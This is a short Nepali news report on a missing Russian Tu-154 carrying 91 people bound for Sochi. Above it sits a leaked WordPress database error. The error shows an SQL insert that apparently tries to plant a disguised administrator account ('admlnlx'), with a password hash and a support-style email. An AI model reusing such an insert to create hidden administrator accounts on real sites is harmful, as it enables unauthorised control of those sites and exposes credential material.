WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B179O/NM8v6gXmc5y5.KybZuc/FAbd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:58:39', '', 'admlnlx', 'admlnlx')
रसिया, पुस १०–
९१ यात्रु बोकेको रसियन विमान बेपत्ता भएको छ। अन्तर्राष्ट्रिय सञ्चार माध्यमका अनुसार ८३ यात्रु र ८ जना चालक दलका सदस्यसहितको विमान सम्पर्क विहिन भएको रसियन रक्षा मन्त्रालयले जनाएको छ।
काला सागरबाट सोचीका लागि उडेको टीयू–१५४ विमान उडेकै केही मिनेटमै रडारको सम्पर्कबाट हराएको थियो ।